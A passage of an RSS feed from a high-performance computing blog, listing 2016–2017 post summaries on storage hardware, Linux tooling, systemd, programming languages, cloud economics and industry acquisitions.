      <link>https://blog.scalability.org/2017/01/ssdflashmemory-shortage-day-n1/</link>
      <pubDate>Mon, 16 Jan 2017 19:53:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/ssdflashmemory-shortage-day-n1/</guid>
      <description>There has been a huge demand of SSD/Flash/memory components from a number of end users. Sadly not the day jobs customers &amp;hellip; but enough to deplete the market of supply. Watching basic economics at work is fascinating. Supply is highly constrained, while demand is rising. Couple that with a (mis)expectation of continuous falling prices across the board leads to interesting conversations with customers. We&amp;rsquo;ve tried to set expectations appropriately, but we&amp;rsquo;ve been bitten in the past by doing just this.</description>
    </item>
    
    <item>
      <title>A new (old) customer for the day job</title>
      <link>https://blog.scalability.org/2017/01/a-new-old-customer-for-the-day-job/</link>
      <pubDate>Mon, 16 Jan 2017 19:40:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/a-new-old-customer-for-the-day-job/</guid>
      <description>Our friends at MSU HPCC now are the proud owners of a very fast/high performance Unison Flash storage system, and a ZFS backed high performance Unison storage spinning disk unit. Installed first week of Jan 2017. As MSU is one of my alma mater institutions, I am quite happy about helping them out with this kit. They&amp;rsquo;ve been a customer previously; they had bought some HPC MPI/OpenMP programming training in the dim and distant past.</description>
    </item>
    
    <item>
      <title>Architecture matters, and yes Virginia, there are no silver bullets for performance</title>
      <link>https://blog.scalability.org/2017/01/architecture-matters-and-yes-virginia-there-are-no-silver-bullets-for-performance/</link>
      <pubDate>Mon, 16 Jan 2017 19:31:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/architecture-matters-and-yes-virginia-there-are-no-silver-bullets-for-performance/</guid>
      <description>Time and time again, the day job had been asked to discuss how the solutions are differentiated. Time and time again, we showed benchmarks on real workloads that show significant performance deltas. Not 2 or 3 sigma measurements. More often than not, 2x -&amp;gt; 10x better. Yet &amp;hellip; yet &amp;hellip; we were asked, again and again, how we did it. We pointed to our architecture. But, they complained, isn&amp;rsquo;t it the same as X (insert your favorite volume vendor here)?</description>
    </item>
    
    <item>
      <title>#Perl on the rise for #DevOps</title>
      <link>https://blog.scalability.org/2017/01/perl-on-the-rise-for-devops/</link>
      <pubDate>Sun, 08 Jan 2017 16:15:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/perl-on-the-rise-for-devops/</guid>
      <description>Note: I do quite a bit of development in Perl, and have my own biases, so please do take this into consideration. It is one of many languages I use, but it is by and large, my current go-to language. I&amp;rsquo;ll discuss below. According to TIOBE (yeah, I know), Perl usage is on the rise. The linked article posits that this is for DevOps reasons. The author of the article works at a company that makes money from Perl and Python &amp;hellip; they build (actually very good) tools.</description>
    </item>
    
    <item>
      <title>Another itch scratched</title>
      <link>https://blog.scalability.org/2016/12/another-itch-scratched/</link>
      <pubDate>Mon, 26 Dec 2016 22:58:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/12/another-itch-scratched/</guid>
      <description>So there you are, with many software RAIDs. You&amp;rsquo;ve been building and rebuilding them. And somewhere along the line, you lost track of which devices were which. So somehow you didn&amp;rsquo;t clean up the last build right, and you thought you had a hot spare &amp;hellip; until you looked at /proc/mdstat &amp;hellip; and said &amp;hellip; Oh &amp;hellip; So. I wanted to do the detailed accounting, in a simple way. I want the tool to tell me if I am missing a physical drive (e.</description>
    </item>
    
    <item>
      <title>ClusterHQ dies</title>
      <link>https://blog.scalability.org/2016/12/clusterhq-dies/</link>
      <pubDate>Fri, 23 Dec 2016 16:28:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/12/clusterhq-dies/</guid>
      <description>ClusterHQ is now dead. They were an early container play, building a number of tools around Docker/etc. for the space. Containers are a step between bare metal and VMs. FLocker (ClusterHQ&amp;rsquo;s product) is open source, and they were looking to monetize it in a different way (not on acquisition, but on support). In this space though, Kubernetes reigns supreme. So competing products/projects need to adapt or outcompete. And its very hard to outcompete something like k8s.</description>
    </item>
    
    <item>
      <title>fortran for webapps</title>
      <link>https://blog.scalability.org/2016/12/fortran-for-webapps/</link>
      <pubDate>Wed, 21 Dec 2016 03:21:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/12/fortran-for-webapps/</guid>
      <description>Use Fortran for your MVC web app. No, really &amp;hellip; Here you are, coding your new density functional theory app, and you want to give it a nice shiny new web framework front end. Config files are so &amp;hellip; 80s &amp;hellip; Like in grad school, man &amp;hellip; You want shiny new MVC action, with the goodness of fortran mixed in. Out comes Fortran.io.</description>
    </item>
    
    <item>
      <title>Another fun bit of debugging</title>
      <link>https://blog.scalability.org/2016/12/another-fun-bit-of-debugging/</link>
      <pubDate>Wed, 21 Dec 2016 03:12:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/12/another-fun-bit-of-debugging/</guid>
      <description>Ok &amp;hellip; so here you are doing a code build. Your environment is all set. You have ample space. Lots of CPU, lots of RAM. All packages are up to date. You start your make. You have another window open with dstat running, just to kinda, sorta watch the system, while you are doing other things. And while you are working, you realize dstat has stopped scrolling. Strange, why would that be.</description>
    </item>
    
    <item>
      <title>Violin files for Chapter 11</title>
      <link>https://blog.scalability.org/2016/12/violin-files-for-chapter-11/</link>
      <pubDate>Sat, 17 Dec 2016 17:34:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/12/violin-files-for-chapter-11/</guid>
      <description>This has been long in coming. I feel for the people involved. Violin makes proprietary flash modules and chassis, to provide an all flash &amp;ldquo;array&amp;rdquo;. The performance is somewhat &amp;ldquo;meh&amp;rdquo;, and the cost is high. Like most of the rest of the companies in this space, their latest model bits are quite a bit below Scalable&amp;rsquo;s 4 year old models, never mind the new stuff. Since the IPO, they&amp;rsquo;ve been on something of a monotonic down-direction in share price.</description>
    </item>
    
    <item>
      <title>So it seems Java is not free</title>
      <link>https://blog.scalability.org/2016/12/so-it-seems-java-is-not-free/</link>
      <pubDate>Sat, 17 Dec 2016 17:26:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/12/so-it-seems-java-is-not-free/</guid>
      <description>This article on The Register indicates that Oracle is now working actively to monetize java use. Given the spate of java hacks over the years, and the decidedly non-free nature of the language, I suspect we are going to see replacement development language use skyrocket, as people develop in anything-but-Java going forward. Think about the risks &amp;hellip; you have a massive platform that people have been using with a fairly large number of compromises (client side certainly) &amp;hellip; and now you need to start paying for the privilege of using the platform.</description>
    </item>
    
    <item>
      <title>She&#39;s dead Jim</title>
      <link>https://blog.scalability.org/2016/12/shes-dead-jim/</link>
      <pubDate>Thu, 01 Dec 2016 18:35:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/12/shes-dead-jim/</guid>
      <description>It looks like (if the rumor is true) that Solaris will be pushing up the daisies soon. Note: Solaris != SmartOS This has been a long time coming. Combine this with Fujitsu dumping SPARC for headline projects &amp;hellip; yeah &amp;hellip; its likely over. FWIW: I like SmartOS. The issue for it are drivers. We tried helping, and were able to get one group to update their driver set. But getting others to update (specifically Mellanox) will be even harder now (and it was impossible beforehand, for reasons that were not Mellanox&amp;rsquo;s fault).</description>
    </item>
    
    <item>
      <title>On closure</title>
      <link>https://blog.scalability.org/2016/11/on-closure/</link>
      <pubDate>Wed, 09 Nov 2016 19:44:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/11/on-closure/</guid>
      <description>I work with many people, have regular email and phone contact with them, as well as occasional face to face meetings. We talk ideas back and forth, develop plans. I work on designs, coordinating everything that goes into those designs (usually built upon our kit). I work hard on my proposals, thinking many things through, developing very detailed plans. I share these with the people &amp;hellip; our customers. And then the pinging begins.</description>
    </item>
    
    <item>
      <title>Inventory reduction event at the day job</title>
      <link>https://blog.scalability.org/2016/11/inventory-reduction-event-at-the-day-job/</link>
      <pubDate>Wed, 02 Nov 2016 20:02:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/11/inventory-reduction-event-at-the-day-job/</guid>
      <description>We&amp;rsquo;ve got 3x Unison (https://scalableinformatics.com/unison) and 1x cadence (https://scalableinformatics.com/cadence) system that we need to clear out. The Unison machines are 5-7GB/s each, and the Cadence is 10-20GB/s and 200-600k IOPs (depending upon storage configuration). More info by emailing me. Everything is on a first come, first served basis, feel free to reach out if you&amp;rsquo;d like to hear more. Specs: ucp-01: Unison1 12 core, 128GB ram 2x40GbE or 4x10GbE ports 60x 2TB drives 4x 800GB SSD ucp-04: Unison2 12 core, 128GB ram 2x40GbE or 4x10GbE ports 60x 2TB drives 4x 800GB SSD usn-03: Cadence1 12 core, 128GB ram 2x40GbE or 4x10GbE ports 48x 400GB SATA SSD One more unlisted Unison unit with the same specs as the others, though with 3TB drives.</description>
    </item>
    
    <item>
      <title>Its 2016, almost 2017 ... fix your application installer so it doesn&#39;t need to reboot my machine!</title>
      <link>https://blog.scalability.org/2016/11/its-2016-almost-2017-fix-your-application-installer-so-it-doesnt-need-to-reboot-my-machine/</link>
      <pubDate>Tue, 01 Nov 2016 17:10:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/11/its-2016-almost-2017-fix-your-application-installer-so-it-doesnt-need-to-reboot-my-machine/</guid>
      <description>There I was running my windows in a window on my desktop. Running a nice little word processor from a company in Redmond, WA. Working on a document. About 15 minutes in, and I usually save at 30 minute boundaries &amp;hellip; because &amp;hellip; hey &amp;hellip; they haven&amp;rsquo;t quite figured out that the word processor should do this for you &amp;hellip; AUTOMATICALLY &amp;hellip; Ok, I am shouting. Calm down. Anyway, for some reason, some little Cupertino company&amp;rsquo;s code pops up and says &amp;ldquo;hey, you wanna update me?</description>
    </item>
    
    <item>
      <title>strace -p is your friend</title>
      <link>https://blog.scalability.org/2016/10/strace-p-is-your-friend/</link>
      <pubDate>Wed, 26 Oct 2016 14:10:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/10/strace-p-is-your-friend/</guid>
      <description>So there I was, trying to use a serial port on a node which was connected to a serial port on a switch. Which I needed to properly configure the switch. So I light up minicom and get garbage. Great, a baud rate mismatch, easily fixed. Fix it. Connect again. I get the first 10-12 characters &amp;hellip; and then garbage. Hmmm. I&amp;rsquo;d like to pause our story for a moment, and say I had the key insight at this moment &amp;hellip; but that would not be true.</description>
    </item>
    
    <item>
      <title>Finding unpatched &#34;features&#34; in distro packages</title>
      <link>https://blog.scalability.org/2016/10/finding-unpatched-features-in-distro-packages/</link>
      <pubDate>Wed, 19 Oct 2016 16:07:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/10/finding-unpatched-features-in-distro-packages/</guid>
      <description>I generally expect baseline distro packages to be &amp;ldquo;old&amp;rdquo; by some measure. Even for more forward thinking distros, they generally (mis)equate age with stability. I&amp;rsquo;ve heard the expression &amp;ldquo;bug for bug compatible&amp;rdquo; when dealing with newer code on older systems. Something about the devil you know vs the devil you don&amp;rsquo;t. Ok. In this case, Cmake. A good development tool, gaining popularity over autotools and other things. Base SIOS image is on Debian 8.</description>
    </item>
    
    <item>
      <title>Watching a low level attack in process</title>
      <link>https://blog.scalability.org/2016/10/watching-a-low-level-attack-in-process/</link>
      <pubDate>Sat, 15 Oct 2016 21:18:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/10/watching-a-low-level-attack-in-process/</guid>
      <description>I won&amp;rsquo;t say where, but it is fascinating watching what is being tried. I won&amp;rsquo;t divulge details of any sort (asymmetric information works to my advantage here).</description>
    </item>
    
    <item>
      <title>On expectations</title>
      <link>https://blog.scalability.org/2016/10/on-expectations/</link>
      <pubDate>Wed, 05 Oct 2016 02:09:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/10/on-expectations/</guid>
      <description>This has happened multiple times over the last few months. Just variations on the theme as it were, so I&amp;rsquo;ll talk about the theme. The day job builds some of the fastest systems for storage and analytics in market. We pride ourselves on being able to make things go very &amp;hellip; very fast. If its slow, IMO, its a bug. So we often get people contacting us with their requirements. These requirements are often very hard for our competitors, and fairly simple for us to address.</description>
    </item>
    
    <item>
      <title>Excellent article on mistakes made for infrastructure ... cloud jail is about right</title>
      <link>https://blog.scalability.org/2016/09/excellent-article-on-mistakes-made-for-infrastructure-cloud-jail-is-about-right/</link>
      <pubDate>Fri, 30 Sep 2016 17:37:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/excellent-article-on-mistakes-made-for-infrastructure-cloud-jail-is-about-right/</guid>
      <description>Article is here at Firstround capital. This goes to a point I&amp;rsquo;ve made many many times to customers going the cloud route exclusively rather than the internal infrastructure route or hybrid route. Basically it is that the economics simply don&amp;rsquo;t work. We&amp;rsquo;ve used a set of models based upon observed customer use cases, and demonstrated this to many folks (customers, VCs, etc.) Many are unimpressed until they actually live the life themselves, have the bills to pay, and then really &amp;hellip; really grok what is going on.</description>
    </item>
    
    <item>
      <title>The joy of IE and URLs, or how to fix ridiculous parsing errors on the part of some &#34;helpers&#34;</title>
      <link>https://blog.scalability.org/2016/09/the-joy-of-ie-and-urls-or-how-to-fix-ridiculous-parsing-errors-on-the-part-of-some-helpers/</link>
      <pubDate>Thu, 29 Sep 2016 19:39:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/the-joy-of-ie-and-urls-or-how-to-fix-ridiculous-parsing-errors-on-the-part-of-some-helpers/</guid>
      <description>Short version. Day job sending some marketing out. URLs are pretty clear cut. Tested well. But some clients seem to have mis-parsed the url. Like with a trailing &amp;ldquo;)&amp;rdquo;. For some reason. That I don&amp;rsquo;t quite grok. I tried a few ways of fixing it. Yes, I know, because I fixed it, I baked it into the spec. /sigh First was a regex rewrite rule. Turns out the rewrite didn&amp;rsquo;t quite work the way it was intended, and it killed the requests.</description>
    </item>
    
    <item>
      <title>I don&#39;t agree with everything he wrote about systemd, but he isn&#39;t wrong on a fair amount of it</title>
      <link>https://blog.scalability.org/2016/09/i-dont-agree-with-everything-he-wrote-about-systemd-but-he-isnt-wrong-on-a-fair-amount-of-it/</link>
      <pubDate>Thu, 29 Sep 2016 13:45:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/i-dont-agree-with-everything-he-wrote-about-systemd-but-he-isnt-wrong-on-a-fair-amount-of-it/</guid>
      <description>Systemd has taken the linux world by storm. Replacing 20-ish year old init style processing for a more legitimate control plane, and replacing it with a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually some of these things are specifically geared towards desktop users (which isn&amp;rsquo;t a bad thing if you are a desktop linux user, as I am).</description>
    </item>
    
    <item>
      <title>Hows this for a nice deskside system ... one of our Cadence boxen</title>
      <link>https://blog.scalability.org/2016/09/hows-this-for-a-nice-deskside-system-one-of-our-cadence-boxen/</link>
      <pubDate>Wed, 28 Sep 2016 02:30:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/hows-this-for-a-nice-deskside-system-one-of-our-cadence-boxen/</guid>
      <description>For a partner. They made a request for something we&amp;rsquo;ve not built in a while &amp;hellip; it had been end of lifed. One of our old Pegasus units. A portable deskside supercomputer. In this case, a deskside franken-computer &amp;hellip; built out of the spare parts from other units in our lab. It started out as a 24 core monster, but we had a power supply burn out, and take the motherboard with it.</description>
    </item>
    
    <item>
      <title>Build me a big data analysis room</title>
      <link>https://blog.scalability.org/2016/09/build-me-a-big-data-analysis-room/</link>
      <pubDate>Wed, 28 Sep 2016 02:09:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/build-me-a-big-data-analysis-room/</guid>
      <description>This was the request that showed up on our doorstep. A room. Not a system. But a room. Visions of the Star Trek NG bridge came to mind. Then the old SGI power wall &amp;hellip; 7 meters wide by 2 meters high, driven by an awesomely powerful Onyx system (now underpowered compared to a good Nvidia card). Of course, the budget wouldn&amp;rsquo;t allow any of these, but it was still a cool request.</description>
    </item>
    
    <item>
      <title>A good read on realities behind cloud computing</title>
      <link>https://blog.scalability.org/2016/09/a-good-read-on-realities-behind-cloud-computing/</link>
      <pubDate>Fri, 23 Sep 2016 11:53:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/a-good-read-on-realities-behind-cloud-computing/</guid>
      <description>In this article on the venerable Next Platform site, Addison Snell makes a case against some of the presumed truths of cloud computing. One of the points he makes is specifically something we run into all the time with customers, and yet this particular untruth isn&amp;rsquo;t really being reported the way our customers look at it. Sure, you are paying for the unused capacity. This is how utility models work. Tenancy is the most important measure to the business providing the systems.</description>
    </item>
    
    <item>
      <title>Running conditioning on 4x Forte #HPC #NVMe #storage units</title>
      <link>https://blog.scalability.org/2016/09/running-conditioning-on-4x-forte-hpc-nvme-storage-units/</link>
      <pubDate>Wed, 21 Sep 2016 20:42:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/running-conditioning-on-4x-forte-hpc-nvme-storage-units/</guid>
      <description>This is our conditioning pass to get the units to stable state for block allocations. We run a number of fill passes over the units. Each pass takes around 42 minutes for the denser units, 21 minutes for the less dense ones. After a few passes, we hit a nice equilibrium, and performance is more deterministic, and less likely to drop as block allocations gradually fill the unit. We run the conditioning over the complete device, one conditioning process per storage device, with multiple iterations of the passes.</description>
    </item>
    
    <item>
      <title>Amazing statistics</title>
      <link>https://blog.scalability.org/2016/09/amazing-statistics/</link>
      <pubDate>Sun, 18 Sep 2016 16:17:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/amazing-statistics/</guid>
      <description>In the last year, this has been what this blog has seen for visitors/viewers and page views. 188,654 (unique) visitors 2,572,665 page views I am &amp;hellip; humbled &amp;hellip;</description>
    </item>
    
    <item>
      <title>Aquila launches Aquarius</title>
      <link>https://blog.scalability.org/2016/09/aquila-launches-aquarius/</link>
      <pubDate>Thu, 15 Sep 2016 17:11:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/aquila-launches-aquarius/</guid>
      <description>Story is here, at the always excellent InsideHPC site. Scroll the linked page on Aquarius to see some of their tech and their partners &amp;hellip; Congrats guys! Great job!</description>
    </item>
    
    <item>
      <title>New #HPC #storage configs for #bigdata , up to 16PB at 160GB/s</title>
      <link>https://blog.scalability.org/2016/09/new-hpc-storage-configs-for-bigdata-up-to-16pb-at-160gbs/</link>
      <pubDate>Thu, 15 Sep 2016 15:54:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/new-hpc-storage-configs-for-bigdata-up-to-16pb-at-160gbs/</guid>
      <description>This is an update to Scalable Informatics &amp;ldquo;portable petabyte&amp;rdquo; offering. Basically, from 1 to 16PB of usable space, distributed and mirrored metadata, high performance (100Gb) network fabric, we&amp;rsquo;ve got a very dense, very fast system available now, at a very aggressive price point (starting configs around $0.20/GB). Batteries included &amp;hellip; long on features, functionality, performance. Short on cost. We are leveraging the denser spinning rust drives (SRD), as well as a number of storage technologies that we&amp;rsquo;ve built or integrated into the systems.</description>
    </item>
    
    <item>
      <title>Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.</title>
      <link>https://blog.scalability.org/2016/09/fully-ramdisk-booted-centos-7-2-based-sios-image-for-hpc-bigdata-storage-etc/</link>
      <pubDate>Thu, 15 Sep 2016 02:33:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/09/fully-ramdisk-booted-centos-7-2-based-sios-image-for-hpc-bigdata-storage-etc/</guid>
      <description>This is something we&amp;rsquo;ve been working on for a while &amp;hellip; a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat &amp;hellip; just need to point to those repositories). And its available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.</description>
    </item>
    
    <item>
      <title>An article on Python vs Julia for scripting</title>
      <link>https://blog.scalability.org/2016/08/an-article-on-python-vs-julia-for-scripting/</link>
      <pubDate>Tue, 23 Aug 2016 14:32:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/08/an-article-on-python-vs-julia-for-scripting/</guid>
      <description>For those whom don&amp;rsquo;t know, Julia is a very powerful new language, which aims to leverage a JIT compilation mechanism to generate very fast numerical/computational code in general from a well thought out language. I&amp;rsquo;ve argued for a while that it feels like a better Python than Python. Python, for those whom aren&amp;rsquo;t aware, is a scripting language which has risen in popularity over the recent years. It is generally fairly easy to work in, with a few caveats.</description>
    </item>
    
    <item>
      <title>OpenLDAP &#43; sssd ... the simple guide</title>
      <link>https://blog.scalability.org/2016/08/openldap-sssd-the-simple-guide/</link>
      <pubDate>Mon, 22 Aug 2016 19:45:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/08/openldap-sssd-the-simple-guide/</guid>
      <description>Ok. Here&amp;rsquo;s the problem. Small environment for customers, whom are not really sure what they want and need for authentication. Yes, they asked us to use local users for the machines. No, the number of users was not small. AD may or may not be in the picture. Ok, I am combining two sets of users with common problems here. In one case, they wanted manual installation of many users onto machines without permanent config files.</description>
    </item>
    
    <item>
      <title>M&amp;A time:  HPE buys SGI, mostly for the big data analytics appliances</title>
      <link>https://blog.scalability.org/2016/08/ma-time-hpe-buys-sgi-mostly-for-the-big-data-analytics-appliances/</link>
      <pubDate>Fri, 12 Aug 2016 02:30:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/08/ma-time-hpe-buys-sgi-mostly-for-the-big-data-analytics-appliances/</guid>
      <description>I do expect more consolidation in this space. There aren&amp;rsquo;t many players doing what SGI (and the day job) does. The story is here. The interesting thing about this is, that this is in the high performance data analytics appliance space. As they write:
12-16% CAGR for data analytics, which I think is low &amp;hellip; . And the point they may about the data explosion is exactly what we talk about as well.</description>
    </item>
    
    <item>
      <title>@scalableinfo 60 bay Unison with these: 3.6PB raw per 4U box</title>
      <link>https://blog.scalability.org/2016/08/scalableinfo-60-bay-unison-with-these-3-6pb-raw-per-4u-box/</link>
      <pubDate>Wed, 10 Aug 2016 02:23:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/08/scalableinfo-60-bay-unison-with-these-3-6pb-raw-per-4u-box/</guid>
      <description>Color me impressed &amp;hellip; Seagate and their 60TB 3.5inch SAS drive. Yes, the 60 bay Unison units can handle this. That would be 3.6PB per 4U unit. 10x 4U per 48U rack. 36PB raw per rack. 100PB in 3 racks, 30 racks for an exabyte (EB). The issue would be the storage bandwidth wall height. Doing the math, 60TB/(1GB/s) -&amp;gt; 6 x 104 seconds to empty/fill such a single unit. We can drive these about 50GB/s in a box, so a single box would be 3600TB/(50GB/s) or 7.</description>
    </item>
    
    <item>
      <title>Raw Unapologetic Firepower: kdb&#43; from @Kx</title>
      <link>https://blog.scalability.org/2016/08/raw-unapologetic-firepower-kdb-from-kx/</link>
      <pubDate>Fri, 05 Aug 2016 18:43:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/08/raw-unapologetic-firepower-kdb-from-kx/</guid>
      <description>While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I&amp;rsquo;ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. Its not quite an exact description, have a look at Kx&amp;rsquo;s website for a more accurate one.</description>
    </item>
    
    <item>
      <title>Seagate and ClusterStor: a lesson in not jumping to conclusions based on what was not said</title>
      <link>https://blog.scalability.org/2016/07/seagate-and-clusterstor-a-lesson-in-not-jumping-to-conclusions-based-on-what-was-not-said/</link>
      <pubDate>Tue, 26 Jul 2016 16:38:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/07/seagate-and-clusterstor-a-lesson-in-not-jumping-to-conclusions-based-on-what-was-not-said/</guid>
      <description>I saw this analysis this morning on the Register&amp;rsquo;s channel site. This follows on the announcement of other layoffs and shuttering of facilities. A few things. First a disclosure: arguably, the day job and more specifically our Unison product is in &amp;ldquo;direct&amp;rdquo; competition with ClusterStor, though we never see them in deals. This may or may not be a bad thing, and likely more due to market focus (we do big data, analytics, insanely fast storage in hyperconverged packages) than anything else.</description>
    </item>
    
    <item>
      <title>Systemd and non-desktop scenarios</title>
      <link>https://blog.scalability.org/2016/07/systemd-and-non-desktop-scenarios/</link>
      <pubDate>Wed, 20 Jul 2016 18:49:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/07/systemd-and-non-desktop-scenarios/</guid>
      <description>So we&amp;rsquo;ve been using Debian 8 as the basis of our SIOS v2 system. Debian has a number of very strong features that make it a fantastic basis for developing a platform &amp;hellip; for one, it doesn&amp;rsquo;t have significant negative baggage/technical debt associated with poor design decisions early on in the development of the system as others do. But it has systemd. I&amp;rsquo;ve been generally non-committal about systemd, as it seemed like it should improve some things, at a fairly minor cost in additional complexity.</description>
    </item>
    
    <item>
      <title>You can&#39;t win</title>
      <link>https://blog.scalability.org/2016/07/you-cant-win/</link>
      <pubDate>Wed, 20 Jul 2016 12:16:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/07/you-cant-win/</guid>
      <description>Like that old joke about the patient going to the Doctor for a pain &amp;hellip;
Imagine if you will, a patient whom, after being told what is wrong, and why it hurts, and what to do about it, continues to do it. And be more intensive about doing it. And then complains when it hurts. This is a rough metaphor for some recent support experiences. We do our best to convince them not to do the things that cause them pain, as in this case, they are self-inflicted.</description>
    </item>
    
    <item>
      <title>That was fun ... no wait ... the other thing ... not fun</title>
      <link>https://blog.scalability.org/2016/06/that-was-fun-no-wait-the-other-thing-not-fun/</link>
      <pubDate>Wed, 22 Jun 2016 21:26:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/06/that-was-fun-no-wait-the-other-thing-not-fun/</guid>
      <description>Long overdue update of the server this blog runs on. It is no longer running a Ubuntu flavor, but instead running SIOSv2 which is the same appliance operating system that powers our products. This isn&amp;rsquo;t specifically a case of eating our own dog-food, but more a case that Ubuntu, even the LTS versions, have a specific sell by date, and it is often very hard to update to the newer revs.</description>
    </item>
    
    <item>
      <title>And this was a good idea ... why ?</title>
      <link>https://blog.scalability.org/2016/06/and-this-was-a-good-idea-why/</link>
      <pubDate>Wed, 22 Jun 2016 13:23:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/06/and-this-was-a-good-idea-why/</guid>
      <description>The Debian/Ubuntu update tool is named &amp;ldquo;apt&amp;rdquo; with various utilities built around it. For the most part, it works very well, and software upgrades nicely. Sort of like yum and its ilk, but it pre-dates them. This tool is meant for automated (e.g. lights out) updates. No keyboard interaction should be required. Ever. For any reason. However &amp;hellip; a recent update to one particular package, in Debian, and in Ubuntu, has resulted in installation/updates pausing.</description>
    </item>
    
    <item>
      <title>M&amp;A:  Vertical integration plays</title>
      <link>https://blog.scalability.org/2016/06/ma-vertical-integration-plays/</link>
      <pubDate>Thu, 16 Jun 2016 16:01:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/06/ma-vertical-integration-plays/</guid>
      <description>Two items of note here. First, Cavium acquires qlogic. This is interesting at some levels, as qlogic has been a long time player in storage (and networking). There are many qlogic FC switches out there, as well as some older Infiniband gear (pre-Intel sale). Cavium is more of a processor shop, having built a number of interesting SoC and general purpose CPUs. I am not sure the combo is going to be a serious contender to Intel or others in the data center space, but I think they will be working on carving out a specific niche.</description>
    </item>
    
    <item>
      <title>About that cloud &#34;security&#34;</title>
      <link>https://blog.scalability.org/2016/06/about-that-cloud-security/</link>
      <pubDate>Mon, 13 Jun 2016 12:20:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/06/about-that-cloud-security/</guid>
      <description>Wow &amp;hellip; might want to rethink what you do and how you do it. See here. Put in simple terms, why bother to encrypt if your key is (trivially) recoverable? I did not realize that side channel attacks were so effective. Will read the paper. If this isn&amp;rsquo;t just a highly over specialized case, and is actually applicable to real world scenarios, we&amp;rsquo;ll need to make sure we understand methods to mitigate.</description>
    </item>
    
    <item>
      <title>Ah Gmail ... losing more emails</title>
      <link>https://blog.scalability.org/2016/06/ah-gmail-losing-more-emails/</link>
      <pubDate>Fri, 10 Jun 2016 17:36:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/06/ah-gmail-losing-more-emails/</guid>
      <description>So &amp;hellip; my wife and I have private gmail addresses. Not related to the day job. She sends me an email from there. It never arrives. Gmail to gmail. Not in the spam folder. But to gmail. So I have her send it to this machine. Gets here right away. We moved the day job&amp;rsquo;s support email address off gmail (its just a reflector now) into the same tech running inside our FW.</description>
    </item>
    
    <item>
      <title>Real scalability is hard, aka there are no silver bullets</title>
      <link>https://blog.scalability.org/2016/06/real-scalability-is-hard-aka-there-are-no-silver-bullets/</link>
      <pubDate>Tue, 07 Jun 2016 17:43:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/06/real-scalability-is-hard-aka-there-are-no-silver-bullets/</guid>
      <description>I talked about hypothetical silver bullets in the recent past at a conference and to customers and VCs. Basically, there is no such thing as a silver bullet &amp;hellip; no magic pixie dust, or magical card, or superfantastic software you can add to a system to make it incredibly faster. Faster, better performing systems require better architecture (physical, algorithmic, etc.). You really cannot hope to throw a metric-ton of machines at a problem and hope that scaling is simple and linear.</description>
    </item>
    
    <item>
      <title>Having to do this in a kernel build is simply annoying</title>
      <link>https://blog.scalability.org/2016/06/having-to-do-this-in-a-kernel-build-is-simply-annoying/</link>
      <pubDate>Thu, 02 Jun 2016 18:48:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/06/having-to-do-this-in-a-kernel-build-is-simply-annoying/</guid>
      <description>So there are some macros, DATE and TIME that the gcc compiler knows about. And some people inject these into their kernel module builds, because, well, why not. The issue is that they can make &amp;ldquo;reproducible builds&amp;rdquo; harder. Well, no, they really don&amp;rsquo;t. That&amp;rsquo;s a side issue. And of course, modern kernel builds use -Wall -Werror which converts warnings like macro &amp;quot;__TIME__&amp;quot; might prevent reproducible builds [-Werror=date-time] into real honest-to-goodness errors.</description>
    </item>
    
    <item>
      <title>Talk from #Kxcon2016 on #HPC #Storage for #BigData analytics is up</title>
